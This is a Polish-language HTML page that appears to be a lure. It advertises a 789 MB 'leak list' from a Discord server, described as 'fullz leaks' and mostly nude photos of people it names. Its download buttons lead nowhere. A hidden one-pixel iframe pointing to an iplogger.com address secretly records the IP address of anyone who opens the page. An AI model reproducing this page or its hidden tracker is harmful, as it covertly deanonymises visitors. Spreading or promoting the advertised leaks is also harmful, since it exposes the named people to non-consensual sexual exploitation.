<html>
<head>
<title>/poland LeakList - Upload&Download</title>
<meta name="title" content="/poland LeakList - Upload&Download">
<meta name="description" content="👻 discord.gg/poland LeakList by mlodykreska#0002">

<!-- Open Graph / Facebook -->
<meta property="og:type" content="website">
<meta property="og:url" content="https://metatags.io/">
<meta property="og:title" content="/poland LeakList - Upload&Download">
<meta property="og:description" content="👻 discord.gg/poland LeakList by mlodykreska#0002">
<style>
p {
font-family: Montserrat;
  text-align: center;
  color: white;
  }
h1 {
font-family: Arial;
  text-align: center;
color: white;
  }
body {
background: linear-gradient(360deg, #0D270C 0%, #224E2F 100%);
  cursor: wait;
  }
div {
text-align: center;
  }
  .myButton {
	box-shadow:inset 0px 0px 15px 3px #3e7327;
	background:linear-gradient(to bottom, #77b55a 5%, #72b352 100%);
	background-color:#77b55a;
	border-radius:17px;
	border:1px solid #4b8f29;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:15px;
	padding:6px 13px;
	text-decoration:none;
	text-shadow:0px 1px 0px #5b8a3c;
}
.myButton:hover {
	background:linear-gradient(to bottom, #72b352 5%, #77b55a 100%);
	background-color:#72b352;
}
.myButton:active {
	position:relative;
	top:1px;
}

  </style>
  </head>
<body>
  <h1> Najlepsza Paczka Leaked /poland </h1>
<br>
  <p> 789Mb // fullz leaks </p>
<br>
<div>
<a href="#" class="myButton">Pobierz</a>
<a href="#" class="myButton">Obejrzyj</a>
	</div>
<br>
	<h1> Opis </h1>
<br>
<p> Podsumowanie leakow 2022 discord.gg/poland na liscie m.in. Astrid, Mrucza, Nesia, Rusinowa, Nusia, Doma, Dżasuo, Somai, Antos, Venio, Mlodykreska, Liptonek i wiele wiecej (ponad 75% to nudle i zdjecia jakies tam).


<iframe src="https://iplogger.com/2yqqS4" style="border:0px #ffffff none;" name="myiFrame" scrolling="no" frameborder="1" marginheight="0px" marginwidth="0px" height="1px" width="1px" allowfullscreen></iframe>
  </body>
</html>
